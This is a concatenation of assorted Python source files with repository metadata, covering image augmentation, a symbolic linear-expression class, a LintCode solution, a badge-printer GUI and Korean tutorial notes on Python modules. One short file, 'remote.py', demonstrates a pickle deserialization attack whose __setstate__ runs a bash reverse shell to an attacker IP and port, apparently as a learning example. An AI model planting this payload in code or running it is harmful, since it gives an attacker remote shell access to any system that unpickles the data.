rotate_limit=(-0.0, 0.0), aspect_limit=(-0.0, 0.0), borderMode=cv2.BORDER_CONSTANT, u=0.5): if np.random.random() < u: height, width, channel = image.shape angle = np.random.uniform(rotate_limit[0], rotate_limit[1]) scale = np.random.uniform(1 + scale_limit[0], 1 + scale_limit[1]) aspect = np.random.uniform(1 + aspect_limit[0], 1 + aspect_limit[1]) sx = scale * aspect / (aspect ** 0.5) sy = scale / (aspect ** 0.5) dx = round(np.random.uniform(shift_limit[0], shift_limit[1]) * width) dy = round(np.random.uniform(shift_limit[0], shift_limit[1]) * height) cc = np.math.cos(angle / 180 * np.math.pi) * sx ss = np.math.sin(angle / 180 * np.math.pi) * sy rotate_matrix = np.array([[cc, -ss], [ss, cc]]) box0 = np.array([[0, 0], [width, 0], [width, height], [0, height], ]) box1 = box0 - np.array([width / 2, height / 2]) box1 = np.dot(box1, rotate_matrix.T) + np.array([width / 2 + dx, height / 2 + dy]) box0 = box0.astype(np.float32) box1 = box1.astype(np.float32) mat = cv2.getPerspectiveTransform(box0, box1) image = cv2.warpPerspective(image, mat, (width, height), flags=cv2.INTER_LINEAR, borderMode=borderMode, borderValue=( 0, 0, 0,)) return image def aug_image(image, is_infer=False): if is_infer: image = randomHorizontalFlip(image, u=0) image = np.asarray(image) image = cropping(image, ratio=0.8, code=0) return image else: image = randomHorizontalFlip(image) height, width, _ = image.shape image = randomShiftScaleRotate(image, shift_limit=(-0.1, 0.1), scale_limit=(-0.1, 0.1), aspect_limit=(-0.1, 0.1), rotate_limit=(-30, 30)) image = cv2.resize(image, (width, height)) image = random_erasing(image, probability=0.5, sl=0.02, sh=0.4, r1=0.3) ratio = random.uniform(0.6,0.99) image = random_cropping(image, ratio=ratio, is_random=True) return image def generate_dataset_loader(df_all, c_train, train_transform, train_batch_size, c_val, val_transform, val_batch_size, workers): train_dataset = RSNA_Dataset_train_by_study_context(df_all, c_train, train_transform) val_dataset = RSNA_Dataset_val_by_study_context(df_all, c_val, val_transform) train_loader = torch.utils.data.DataLoader( train_dataset, batch_size=train_batch_size, shuffle=True, num_workers=workers, pin_memory=True, drop_last=True) val_loader = torch.utils.data.DataLoader( val_dataset, batch_size=val_batch_size, shuffle=False, num_workers=workers, pin_memory=True, drop_last=False) return train_loader, val_loader
35.428571
127
0.585905
791a1d723e3ac41611111288856b9455ae2db9b4
7,325
py
Python
resources/mechanics_lib/api/symbolic.py
PRECISE/ROSLab
2a6a295b71d4c73bc5c6ae2ec0330274afa31d0d
[ "Apache-2.0" ]
7
2016-01-20T02:33:00.000Z
2021-02-04T04:06:57.000Z
resources/mechanics_lib/api/symbolic.py
PRECISE/ROSLab
2a6a295b71d4c73bc5c6ae2ec0330274afa31d0d
[ "Apache-2.0" ]
null
null
null
resources/mechanics_lib/api/symbolic.py
PRECISE/ROSLab
2a6a295b71d4c73bc5c6ae2ec0330274afa31d0d
[ "Apache-2.0" ]
3
2016-10-05T07:20:30.000Z
2017-11-20T10:36:50.000Z
import math from operator import add, mul, div, sub class Symbol: def __init__(self, name, default=None): self.name = name self.default = default def __str__(self): return self.name def __repr__(self): if self.default is None: return 'SYMB[%s]' % self.name else: return 'SYMB[%s=%f]' % (self.name, self.default) def toLinearExpr(self): return LinearExpr({self: 1}) def testResult(result, op, *args): assert abs(LinearExpr.evalDefault(result) - op(*[LinearExpr.evalDefault(x) for x in args])) < 1e-6 def tested(op): def decorator(f): def actual(*args): result = f(*args) testResult(result, op, *args) return result return actual return decorator class LinearExpr: def __init__(self, coeffs=None, const=0.0): if not coeffs: coeffs = {} self.coeffs = {} self.const = float(const) if abs(self.const) < 1e-7: self.const = 0.0 for symbol in coeffs: if not abs(coeffs[symbol]) < 1e-7: self.coeffs[symbol] = coeffs[symbol] @tested(add) def __add__(self, other): if not isinstance(other, LinearExpr): return self + LinearExpr(const=other) newcoeffs = dict(self.coeffs) for var in other.coeffs: if var in newcoeffs: newcoeffs[var] += other.coeffs[var] else: newcoeffs[var] = other.coeffs[var] return LinearExpr(newcoeffs, self.const + other.const) __radd__ = __add__ @tested(mul) def __mul__(self, other): if isinstance(other, LinearExpr): if len(self.coeffs) == 0: return other * self.const if len(other.coeffs) == 0: return self * other.const raise ("Multiplying two non-const linear expressions would result in a non-linear expression", self, other) else: scale = float(other) newcoeffs = {} for var in self.coeffs: newcoeffs[var] = self.coeffs[var] * scale return LinearExpr(newcoeffs, self.const * scale) __rmul__ = __mul__ @tested(lambda x,y:float(x)/y) def __div__(self, other): if not isinstance(other, LinearExpr): return self * (1.0 / other) elif len(other.coeffs)==0: return self * (1.0 / other.const) else: ratio = [None] def feedNewRatio(newRatio): if ratio[0] is None: ratio[0] = newRatio elif abs(ratio[0] - newRatio) < 1e-6: pass else: raise ("Cannot divide due to non-constant quotient", self, other) for symbol in set(self.coeffs.keys() + other.coeffs.keys()): vala = self.coeffs[symbol] if symbol in self.coeffs else 0.0 valb = other.coeffs[symbol] if symbol in other.coeffs else 0.0 if valb == 0.0: raise ("Cannot divide due to non-constant quotient or division by zero", self, other) feedNewRatio(vala / valb) if ratio[0] is None: return self.const / other.const else: if not (abs(self.const) < 1e-6 and abs(self.const) < 1e-6): feedNewRatio(self.const / other.const) return ratio[0] @tested(lambda x,y:float(y)/x) def __rdiv__(self, other): if abs(other) < 1e-6 and self.coeffs != 0.0: return 0 else: raise ("Cannot divide due to non-constant quotient or division by zero", self, other) @tested(sub) def __sub__(self, other): if not isinstance(other, LinearExpr): return self - LinearExpr(const=other) newcoeffs = dict(self.coeffs) for var in other.coeffs: if var in newcoeffs: newcoeffs[var] -= other.coeffs[var] else: newcoeffs[var] = -other.coeffs[var] return LinearExpr(newcoeffs, self.const - other.const) @tested(lambda x,y:y-x) def __rsub__(self, other): return LinearExpr(const=other) - self @tested(lambda x:-x) def __neg__(self): newcoeffs = {} for var in self.coeffs: newcoeffs[var] = -self.coeffs[var] return LinearExpr(newcoeffs, -self.const) @staticmethod @tested(lambda a,b:math.atan2(a,b)) def atan2(a, b): if not isinstance(a, LinearExpr): a = LinearExpr(const=a) if not isinstance(b, LinearExpr): b = LinearExpr(const=b) defaultA = LinearExpr.evalDefault(a) defaultB = LinearExpr.evalDefault(b) res = [math.atan2(defaultA, defaultB)] # enclosed in array to get around closure issues def feedNewRes(newRes): if abs(abs(newRes - res[0]) - math.pi) < 1e-6: pass elif abs(newRes - res[0]) < 1e-6: pass else: raise ("Cannot take atan2 of two linear expressions that do not have a constant ratio", a, b) for symbol in set(a.coeffs.keys() + b.coeffs.keys()): vala = a.coeffs[symbol] if symbol in a.coeffs else 0.0 valb = b.coeffs[symbol] if symbol in b.coeffs else 0.0 feedNewRes(math.atan2(vala, valb)) if res is None: return math.atan2(a.const, b.const) else: if not (abs(a.const) < 1e-7 and abs(b.const) < 1e-7): feedNewRes(math.atan2(a.const, b.const)) return res[0] @staticmethod @tested(lambda a,b:math.hypot(a,b)) def hypot(a, b): if not isinstance(a, LinearExpr): a = LinearExpr(const=a) if not isinstance(b, LinearExpr): b = LinearExpr(const=b) LinearExpr.atan2(a, b) # ensure that the ratio is constant aEval = LinearExpr.evalDefault(a) bEval = LinearExpr.evalDefault(b) result = math.hypot(aEval, bEval) if max(abs(aEval), abs(bEval)) < 1e-6: return LinearExpr(const=0.0) elif abs(aEval) < abs(bEval): return result / bEval * b else: return result / aEval * a def eval(self, assignment): newcoeffs = {} const = self.const for var in self.coeffs: if var in assignment: const += self.coeffs[var] * assignment[var] else: newcoeffs[var] = self.coeffs[var] if len(newcoeffs) > 0: return LinearExpr(newcoeffs, const) else: return const @staticmethod def evalDefault(expr): if not isinstance(expr, LinearExpr): return expr assignment = {} for symbol in expr.coeffs: if symbol.default is None: raise ("Cannot evaluate default, symbol missing default", expr) assignment[symbol] = symbol.default return expr.eval(assignment) def __str__(self): res = '' first = True if self.const != 0.0: res += str(self.const) first = False for symbol in self.coeffs: coeff = self.coeffs[symbol] if coeff > 0 and not first: res += '+' + str(coeff) + str(symbol.name) else: res += str(coeff) + str(symbol.name) first = False if res == '': return '0.0' return res def __eq__(self, other): if not isinstance(other, LinearExpr): return self.__eq__(LinearExpr(const=other)) return (self.coeffs, self.const) == (other.coeffs, other.const) def __hash__(self): if len(self.coeffs) == 0: return hash(self.const) return hash((frozenset(self.coeffs.iteritems()), self.const)) @staticmethod def round(expr, dig): if not isinstance(expr, LinearExpr): return LinearExpr.round(LinearExpr(const=expr), dig) else: newcoeffs = {} for var in expr.coeffs: newcoeffs[var] = round(expr.coeffs[var], dig) return LinearExpr(newcoeffs, round(expr.const, dig)) __repr__ = __str__
29.417671
113
0.625119
f776538d6282674313ee6dc35b608e379b9e103d
462
py
Python
python/pickle/remote.py
zeroam/TIL
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
[ "MIT" ]
null
null
null
python/pickle/remote.py
zeroam/TIL
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
[ "MIT" ]
null
null
null
python/pickle/remote.py
zeroam/TIL
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
[ "MIT" ]
null
null
null
import pickle import os class foobar: def __init__(self): pass def __getstate__(self): return self.__dict__ def __setstate__(self, state): # The attack is from 192.168.1.10 # The attacker is listening on port 8080 os.system('/bin/bash -c "/bin/bash -i >& /dev/tcp/192.1681.10/8080 0>&1"') my_foobar = foobar() my_pickle = pickle.dumps(my_foobar) my_unpickle = pickle.loads(my_pickle)
22
83
0.621212
f783c7d956c2efc0cb4921dd6357b6611624950a
572
py
Python
lintcode/035-[DUP]-Search-Insert-Position/SearchInsertPosition_001.py
cc13ny/all-in
bc0b01e44e121ea68724da16f25f7e24386c53de
[ "MIT" ]
1
2015-12-16T04:01:03.000Z
2015-12-16T04:01:03.000Z
lintcode/035-[DUP]-Search-Insert-Position/SearchInsertPosition_001.py
cc13ny/all-in
bc0b01e44e121ea68724da16f25f7e24386c53de
[ "MIT" ]
1
2016-02-09T06:00:07.000Z
2016-02-09T07:20:13.000Z
lintcode/035-[DUP]-Search-Insert-Position/SearchInsertPosition_001.py
cc13ny/all-in
bc0b01e44e121ea68724da16f25f7e24386c53de
[ "MIT" ]
2
2019-06-27T09:07:26.000Z
2019-07-01T04:40:13.000Z
class Solution: """ @param A : a list of integers @param target : an integer to be inserted @return : an integer """ def searchInsert(self, A, target): # write your code here l, r = 0, len(A) - 1 while l <= r: m = (l + r) / 2 if A[m] == target: return m elif A[m] > target: r = m - 1 else: l = m + 1 return l sl = Solution() A = [1, 3, 5, 6] target = [5, 2, 7, 0] for t in target: print sl.searchInsert(A, t)
20.428571
45
0.431818
e3cdadd33382dcd22537074f84cb4cc19d050097
1,423
py
Python
prepareTables.py
flying-sheep/optolith-client
dd3077164e31696b0bb0c8ae8fb895f99ebba6f1
[ "Apache-2.0", "CC0-1.0" ]
null
null
null
prepareTables.py
flying-sheep/optolith-client
dd3077164e31696b0bb0c8ae8fb895f99ebba6f1
[ "Apache-2.0", "CC0-1.0" ]
null
null
null
prepareTables.py
flying-sheep/optolith-client
dd3077164e31696b0bb0c8ae8fb895f99ebba6f1
[ "Apache-2.0", "CC0-1.0" ]
null
null
null
import base64 import os import os.path import sys import zipfile import cryptography from cryptography.fernet import Fernet from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import hashes from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC def decryptTables(): print("Decrypting tables") # Obtain key from enviroment variable key = os.environ['OPTOLITH_KEY'] # Create encryption key salt = b'optolithSalt' kdf = PBKDF2HMAC( algorithm=hashes.SHA256(), length=32, salt=salt, iterations=100000, backend=default_backend()) cryptoKey = base64.urlsafe_b64encode(kdf.derive(key.encode(encoding='UTF-8'))) # Encrypt file f = Fernet(cryptoKey) with open("Tables.crypto", "rb") as sourceFile: with open("Tables.zip", "wb") as targetFile: # encrypted = base64.encodebytes(sourceFile.read()) decrypted = f.decrypt(sourceFile.read()) targetFile.write(decrypted) print("Tables decrypted") def prepareTables(): print("Unpacking tables") # Unpack zip file os.mkdir("app/Database") with zipfile.ZipFile("Tables.zip", 'r') as zip_ref: zip_ref.extractall("app/Database") print("Tables unpacked") if __name__ == "__main__": print("Start to prepare tables...") decryptTables() prepareTables() print("Preparing tables finished")
27.365385
82
0.696416
583543d3f10a9e7a836f64188b7503eb2a4a8e08
5,422
py
Python
badgeprinter.py
pintman/badgeprinter
c8030624a3f2cd33bf8e0b041175e0257eabf815
[ "MIT" ]
null
null
null
badgeprinter.py
pintman/badgeprinter
c8030624a3f2cd33bf8e0b041175e0257eabf815
[ "MIT" ]
1
2017-07-01T12:14:47.000Z
2017-07-09T11:00:37.000Z
badgeprinter.py
pintman/badgeprinter
c8030624a3f2cd33bf8e0b041175e0257eabf815
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # -'''- coding: utf-8 -'''- import sys import subprocess from PySide.QtCore import * from PySide.QtGui import * from PySide.QtDeclarative import * import PIL import PIL.Image import sqlite3 import random from time import sleep import os import configparser os.chdir(os.path.dirname(os.path.realpath(__file__))) class MyHandler(QObject): def __init__(self, window, app, hashtag, logo_filename, *args, **kwargs): QObject.__init__(self, *args, **kwargs) self.window = window self.app = app self.hashtag = hashtag self.logo_filename = logo_filename self.conn = sqlite3.connect('badges.db') c = self.conn.cursor() c.execute(""" CREATE TABLE IF NOT EXISTS badges (created datetime, name text, twitter text, ticket text) """) self.conn.commit() def get_ticket_number(self): c = self.conn.cursor() while True: ticket = "%04d" % random.randint(1,9999) c.execute(""" SELECT count(*) FROM badges WHERE ticket=? """, (ticket,)) if c.fetchone()[0] == 0: c.close() return ticket @Slot() def run(self): inputTwitter = window.rootObject().findChild(QObject, 'inputTwitter') inputTwitter.select(0,0) if inputTwitter.property('text') == "@twitter" or len(inputTwitter.property("text")) < 1: inputTwitter.setProperty("visible", False) inputName = window.rootObject().findChild(QObject, 'inputName') inputName.select(0,0) checkboxSelected = window.rootObject().findChild(QObject, 'checkboxSelected').property('visible') label = window.rootObject().findChild(QObject, 'textLos') ticket = '' if checkboxSelected: ticket = self.get_ticket_number() label.setProperty("text", "Los #%s" % ticket) #label.setProperty("visible", True) inputName.setProperty('focus', False) inputTwitter.setProperty('focus', False) badge = window.rootObject().findChild(QObject, 'badge') image = QPixmap.grabWidget(window, badge.x(), badge.y(), badge.width(), badge.height()) window.rootObject().findChild(QObject, "animateNameBadgeOff").start() self.app.processEvents(QEventLoop.AllEvents, 2000) bytes = QByteArray() buffer = QBuffer(bytes) buffer.open(QIODevice.WriteOnly) image.save(buffer, "PNG") density = 284 / (38.0/50.0) convert = subprocess.Popen(['convert', '-density', '%d' % density, '-quality', '100', 'png:-', '-gravity', 'center', '-resize', '2430x1420!', '/tmp/badge.pdf'], stdin=subprocess.PIPE) convert.communicate(bytes.data()) lpr = subprocess.Popen(['lpr', '-PBrother_QL-710W', '-o', 'fit-to-page', '/tmp/badge.pdf']) lpr.communicate() #convert.stdout.close() #convert.wait()# c = self.conn.cursor() c.execute(""" INSERT INTO badges (created, name, twitter, ticket) VALUES (datetime('now'),?,?,?) """, (inputName.property('text'), inputTwitter.property('text'), ticket)) self.conn.commit() c.close() QTimer.singleShot(2000, lambda: self.reset_ui()) def reset_ui(self): label = window.rootObject().findChild(QObject, 'textLos') label.setProperty("text", "Los #XXXX") inputName = window.rootObject().findChild(QObject, 'inputName') inputName.setProperty('text', "Vorname") inputName.selectAll() inputName.setProperty('focus', True) inputTwitter = window.rootObject().findChild(QObject, 'inputTwitter') inputTwitter.setProperty("visible", True) inputTwitter.setProperty('text', "@twitter") txtHashtag = window.rootObject().findChild(QObject, 'textHashtag') txtHashtag.setProperty("text", self.hashtag) imgLogo = window.rootObject().findChild(QObject, 'imgLogo') imgLogo.setProperty('source', self.logo_filename) window.rootObject().findChild(QObject, 'checkboxSelected').setProperty("visible", True) window.rootObject().findChild(QObject, 'printButtonArea').setProperty('enabled', True) window.rootObject().findChild(QObject, "animateNameBadgeOn").start() # Our main window class MainWindow(QDeclarativeView): def __init__(self, parent=None): super(MainWindow, self).__init__(parent) self.setWindowTitle("Main Window") # Renders 'view.qml' self.setSource(QUrl.fromLocalFile('view.qml')) # QML resizes to main window self.setResizeMode(QDeclarativeView.SizeRootObjectToView) if __name__ == '__main__': # read config config = configparser.ConfigParser() config.read("config.ini") # Create the Qt Application app = QApplication(sys.argv) # Create and show the main window window = MainWindow() window.setWindowFlags(Qt.FramelessWindowHint) handler = MyHandler(window, app, hashtag=config['default']['hashtag'], logo_filename=config['default']['logo_filename']) handler.reset_ui() window.rootContext().setContextProperty("handler", handler) window.rootObject().findChild(QObject, 'inputName').selectAll() window.showFullScreen() # Run the main Qt loop sys.exit(app.exec_())
36.884354
193
0.632239
5475bff1e28db07ad788dae614bde2a3e0dbdf44
191
py
Python
exercises/en/exc_03_14_03.py
tuanducdesign/spacy-course
f8d092c5fa2997fccb3f367d174dce8667932b3d
[ "MIT" ]
2
2020-07-07T01:46:37.000Z
2021-04-20T03:19:43.000Z
exercises/en/exc_03_14_03.py
tuanducdesign/spacy-course
f8d092c5fa2997fccb3f367d174dce8667932b3d
[ "MIT" ]
null
null
null
exercises/en/exc_03_14_03.py
tuanducdesign/spacy-course
f8d092c5fa2997fccb3f367d174dce8667932b3d
[ "MIT" ]
null
null
null
import spacy nlp = spacy.blank("en") people = ["David Bowie", "Angela Merkel", "Lady Gaga"] # Create a list of patterns for the PhraseMatcher patterns = [nlp(person) for person in people]
21.222222
54
0.712042
5491672aaacc47d79cd598167ffc71acb67f4987
19,823
py
Python
python/en/archive/books/jump2python/j2p-05_6_1-import_modules.py
aimldl/coding
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
[ "MIT" ]
null
null
null
python/en/archive/books/jump2python/j2p-05_6_1-import_modules.py
aimldl/coding
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
[ "MIT" ]
null
null
null
python/en/archive/books/jump2python/j2p-05_6_1-import_modules.py
aimldl/coding
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """ j2p-05_6-import_modules.py p.251, 05-6. 외장 함수 The Python Standard Library¶ https://docs.python.org/3/library/index.html Copy & Paste the commands in this script. 이 스크립트의 명령어는 복사해서 Python prompt >>> 에 붙이기로 실행. """ #%% sys # sys 모듈로 파이썬 인터프리터가 제공하는 변수와 함수를 직접 제어할 수 있다. # sys.argv 명령 행에서 인수 전달하기 # argv_test.py import sys print( sys.argv ) # 윈도우즈 # > python test.py abc pey guido # 리눅스 # $ python test.py abc pey guido # # 파이썬 명령어를 위와 같이 실행하면 # 입력인수 (test.py abc pey guido)가 sys.argv라는 리스트에 저장된다. # ['test.py', 'abc', 'pey', 'guido'] # sys.exit 강제로 스크립트 종료하기 # >>> sys.exit() # 를 실행하면 Ctrl + Z, Ctrl+D를 눌러서 대화형 이넡프리터를 종료하는 것과 같다. # sys.path 자신이 만든 모듈 불러와 사용하기 # sys.path는 파이썬 모듈이 저장된 위치를 나타낸다. # 이 경로에 있는 파이썬 모듈들은 어디에서나 불러올 수 있다. # Windows 10의 Ubuntu Linux # aimldl@DESKTOP-HPVQJ6N:/mnt/c/Users/aimldl/Desktop$ python3 # Python 3.6.7 (default, Oct 22 2018, 11:32:17) # [GCC 8.2.0] on linux # Type "help", "copyright", "credits" or "license" for more information. # >>> import sys # >>> sys.path # ['', '/usr/lib/python36.zip', '/usr/lib/python3.6', '/usr/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/dist-packages', '/usr/lib/python3/dist-packages'] # >>> # '' = 현재 디렉터리 # Windows 10의 Anaconda Prompt # (base) C:\Users\aimldl>python # Python 3.7.3 (default, Mar 27 2019, 17:13:21) [MSC v.1915 64 bit (AMD64)] :: Anaconda, Inc. on win32 # Type "help", "copyright", "credits" or "license" for more information. # >>> import sys # >>> sys.path # ['', 'C:\\Users\\aimldl\\Anaconda3\\python37.zip', 'C:\\Users\\aimldl\\Anaconda3\\DLLs', 'C:\\Users\\aimldl\\Anaconda3\\lib', 'C:\\Users\\aimldl\\Anaconda3', 'C:\\Users\\aimldl\\Anaconda3\\lib\\site-packages', 'C:\\Users\\aimldl\\Anaconda3\\lib\\site-packages\\win32', 'C:\\Users\\aimldl\\Anaconda3\\lib\\site-packages\\win32\\lib', 'C:\\Users\\aimldl\\Anaconda3\\lib\\site-packages\\Pythonwin'] # >>> # path_append.py import sys sys.path.append('C:\\Python\\Mymodules') #%% pickle # pickle모듈로 객체의 형태를 그대로 유지하면서, 파일에 저장하고 불러올 수 있다. # write2pickle.py import pickle f = open('test.txt','wb') data = {1:'python', 2:'you need'} pickle.dump( data,f ) f.close() # read_thru_pickle.py import pickle f = open('test.txt','rb') data = pickle.load( f ) print( data ) # {2:'you need', 1:'python'} #%% OS # OS모듈로 환경변수, 디렉토리, 파일 등 OS자원을 제어할 수 있다. #################################################### # os.environ 내 시스템의 환경 변수 값을 알고 싶을 때 # #################################################### # 시스템은 제각기 다른 환경변수 값을 가지고 있다. 그 값을 확인할 수 있다. import os os.environ # Windows 10의 Anaconda Prompt #environ({'ALLUSERSPROFILE': 'C:\\ProgramData', # 'APPDATA': 'C:\\Users\\aimldl\\AppData\\Roaming', # 'COMMONPROGRAMFILES': 'C:\\Program Files\\Common Files', # 'COMMONPROGRAMFILES(X86)': 'C:\\Program Files (x86)\\Common Files', # 'COMMONPROGRAMW6432': 'C:\\Program Files\\Common Files', # 'COMPUTERNAME': 'DESKTOP-HPVQJ6N', # 'COMSPEC': 'C:\\Windows\\system32\\cmd.exe', # 'CONDA_DEFAULT_ENV': 'base', # 'CONDA_EXE': 'C:\\Users\\aimldl\\Anaconda3\\Scripts\\conda.exe', # 'CONDA_PREFIX': 'C:\\Users\\aimldl\\Anaconda3', # 'CONDA_PROMPT_MODIFIER': '(base) ', # 'CONDA_PYTHON_EXE': 'C:\\Users\\aimldl\\Anaconda3\\python.exe', # 'CONDA_SHLVL': '1', # 'DRIVERDATA': 'C:\\Windows\\System32\\Drivers\\DriverData', # 'FPS_BROWSER_APP_PROFILE_STRING': 'Internet Explorer', # 'FPS_BROWSER_USER_PROFILE_STRING': 'Default', # 'HOMEDRIVE': 'C:', # 'HOMEPATH': '\\Users\\aimldl', # 'LOCALAPPDATA': 'C:\\Users\\aimldl\\AppData\\Local', # 'LOGONSERVER': '\\\\DESKTOP-HPVQJ6N', # 'NUMBER_OF_PROCESSORS': '8', # 'ONEDRIVE': 'C:\\Users\\aimldl\\OneDrive', # 'ONEDRIVECONSUMER': 'C:\\Users\\aimldl\\OneDrive', # 'OS': 'Windows_NT', # 'PATH': 'C:\\Users\\aimldl\\Anaconda3; # C:\\Users\\aimldl\\Anaconda3\\Library\\mingw-w64\\bin; # C:\\Users\\aimldl\\Anaconda3\\Library\\usr\\bin; # C:\\Users\\aimldl\\Anaconda3\\Library\\bin; # C:\\Users\\aimldl\\Anaconda3\\Scripts; # C:\\Users\\aimldl\\Anaconda3\\bin; # C:\\Users\\aimldl\\Anaconda3\\condabin; # C:\\Windows\\system32; # C:\\Windows; # C:\\Windows\\System32\\Wbem; # C:\\Windows\\System32\\WindowsPowerShell\\v1.0; # C:\\Windows\\System32\\OpenSSH; # C:\\Program Files\\dotnet; # C:\\Program Files\\Microsoft SQL Server\\130\\Tools\\Binn; # C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\170\\Tools\\Binn; # C:\\Users\\aimldl\\AppData\\Local\\Microsoft\\WindowsApps;.', # 'PATHEXT': '.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC', # 'PROCESSOR_ARCHITECTURE': 'AMD64', # 'PROCESSOR_IDENTIFIER': 'Intel64 Family 6 Model 158 Stepping 9, GenuineIntel', # 'PROCESSOR_LEVEL': '6', # 'PROCESSOR_REVISION': '9e09', # 'PROGRAMDATA': 'C:\\ProgramData', # 'PROGRAMFILES': 'C:\\Program Files', # 'PROGRAMFILES(X86)': 'C:\\Program Files (x86)', # 'PROGRAMW6432': 'C:\\Program Files', # 'PROMPT': '(base) $P$G', # 'PSMODULEPATH': 'C:\\Program Files\\WindowsPowerShell\\Modules; # C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules', # 'PUBLIC': 'C:\\Users\\Public', # 'SESSIONNAME': 'Console', # 'SYSTEMDRIVE': 'C:', # 'SYSTEMROOT': 'C:\\Windows', # 'TEMP': 'C:\\Users\\aimldl\\AppData\\Local\\Temp', # 'TMP': 'C:\\Users\\aimldl\\AppData\\Local\\Temp', # 'USERDOMAIN': 'DESKTOP-HPVQJ6N', # 'USERDOMAIN_ROAMINGPROFILE': 'DESKTOP-HPVQJ6N', # 'USERNAME': 'aimldl', # 'USERPROFILE': 'C:\\Users\\aimldl', # 'WINDIR': 'C:\\Windows'}) #>>> ################################## # os.chdir 디렉터리 위치 변경하기 # ################################## os.chdir('C:\WINDOWS') ######################################## # os.getcwd 현재 디렉토리 위치 리턴 받기 # ######################################## os.getcwd() # 'C:\\Users\\aimldl' ################################### # os.system 시스템 명령어 호출하기 # ################################### # 시스템 자체의 프로그램, 기타 명령어들을 파이썬에서 호출. os.system('dir') # C 드라이브의 볼륨에는 이름이 없습니다. # 볼륨 일련 번호: E0EE-4D5E # # C:\Users\aimldl 디렉터리 # #2019-07-13 토 오후 03:11 <DIR> . #2019-07-13 토 오후 03:11 <DIR> .. #2019-06-25 화 오후 10:09 <DIR> .anaconda #2019-07-12 금 오후 01:30 <DIR> .android #2019-07-12 금 오후 01:29 <DIR> .AndroidStudio3.4 #2019-06-26 수 오전 12:08 <DIR> .conda #2019-06-25 화 오후 10:39 43 .condarc #2019-06-25 화 오후 10:13 <DIR> .continuum #2019-07-12 금 오후 12:41 <DIR> .dotnet #2019-06-25 화 오후 10:11 <DIR> .ipython #2019-06-26 수 오전 12:49 <DIR> .jupyter #2019-06-25 화 오후 11:24 <DIR> .keras #2019-06-25 화 오후 10:11 <DIR> .matplotlib #2019-07-13 토 오후 04:37 380 .python_history #2019-07-13 토 오전 12:21 <DIR> .spyder-py3 #2019-07-12 금 오전 08:45 <DIR> 3D Objects #2019-07-07 일 오후 11:50 <DIR> Anaconda3 #2019-07-12 금 오전 08:45 <DIR> Contacts #2019-07-13 토 오후 02:38 <DIR> Desktop #2019-07-12 금 오후 01:05 <DIR> Documents #2019-07-12 금 오후 05:02 <DIR> Downloads #2019-07-07 일 오후 11:46 <DIR> Dropbox #2019-06-25 화 오전 01:20 <DIR> Evernote #2019-07-12 금 오전 08:45 <DIR> Favorites #2019-07-12 금 오후 02:38 <DIR> iCloudDrive #2019-07-12 금 오전 08:45 <DIR> Links #2019-07-12 금 오전 08:45 <DIR> Music #2019-07-12 금 오후 02:37 <DIR> OneDrive #2019-07-12 금 오전 08:45 <DIR> Pictures #2019-06-25 화 오후 10:35 <DIR> projects #2019-07-12 금 오전 08:45 <DIR> Saved Games #2019-07-12 금 오전 08:45 <DIR> Searches #2019-07-13 토 오후 03:11 40 test.txt #2019-07-12 금 오전 08:45 <DIR> Videos # 3개 파일 463 바이트 # 31개 디렉터리 2,907,742,322,688 바이트 남음 #0 #>>> ############################################# # os.popen 실행한 시스템 명령어의 결과값 받기 # ############################################# # 시스템 명령어의 실행결과값을 읽기모드 형태의 파일 객체로 리턴한다. f = os.popen('dir') print( f ) #<os._wrap_close object at 0x0000021D5142FE48> print( type(f.read() )) #<class 'str'> # 읽어드린 파일 객체의 내용을 보기 print( f.read() ) # C 드라이브의 볼륨에는 이름이 없습니다. # 볼륨 일련 번호: E0EE-4D5E # # C:\Users\aimldl 디렉터리 # #2019-07-13 토 오후 03:11 <DIR> . #2019-07-13 토 오후 03:11 <DIR> .. #2019-06-25 화 오후 10:09 <DIR> .anaconda #2019-07-12 금 오후 01:30 <DIR> .android #2019-07-12 금 오후 01:29 <DIR> .AndroidStudio3.4 #2019-06-26 수 오전 12:08 <DIR> .conda #2019-06-25 화 오후 10:39 43 .condarc #2019-06-25 화 오후 10:13 <DIR> .continuum #2019-07-12 금 오후 12:41 <DIR> .dotnet #2019-06-25 화 오후 10:11 <DIR> .ipython #2019-06-26 수 오전 12:49 <DIR> .jupyter #2019-06-25 화 오후 11:24 <DIR> .keras #2019-06-25 화 오후 10:11 <DIR> .matplotlib #2019-07-13 토 오후 04:37 380 .python_history #2019-07-13 토 오전 12:21 <DIR> .spyder-py3 #2019-07-12 금 오전 08:45 <DIR> 3D Objects #2019-07-07 일 오후 11:50 <DIR> Anaconda3 #2019-07-12 금 오전 08:45 <DIR> Contacts #2019-07-13 토 오후 02:38 <DIR> Desktop #2019-07-12 금 오후 01:05 <DIR> Documents #2019-07-12 금 오후 05:02 <DIR> Downloads #2019-07-07 일 오후 11:46 <DIR> Dropbox #2019-06-25 화 오전 01:20 <DIR> Evernote #2019-07-12 금 오전 08:45 <DIR> Favorites #2019-07-12 금 오후 02:38 <DIR> iCloudDrive #2019-07-12 금 오전 08:45 <DIR> Links #2019-07-12 금 오전 08:45 <DIR> Music #2019-07-12 금 오후 02:37 <DIR> OneDrive #2019-07-12 금 오전 08:45 <DIR> Pictures #2019-06-25 화 오후 10:35 <DIR> projects #2019-07-12 금 오전 08:45 <DIR> Saved Games #2019-07-12 금 오전 08:45 <DIR> Searches #2019-07-13 토 오후 03:11 40 test.txt #2019-07-12 금 오전 08:45 <DIR> Videos # 3개 파일 463 바이트 # 31개 디렉터리 2,907,739,869,184 바이트 남음 #%% 기타 유용한 OS 관련 함수 os.mkdir( directory_name ) # 디렉토리 생성 os.rmdir( directory_name ) # 디렉토리 삭제. 단, 비어있어야 함. os.unlink( file_name ) # rm, 파일을 지운다. os.rename(src,dst) # 파일명 변경 #%% shutil # shutil로 파일을 복사할 수 있다. # 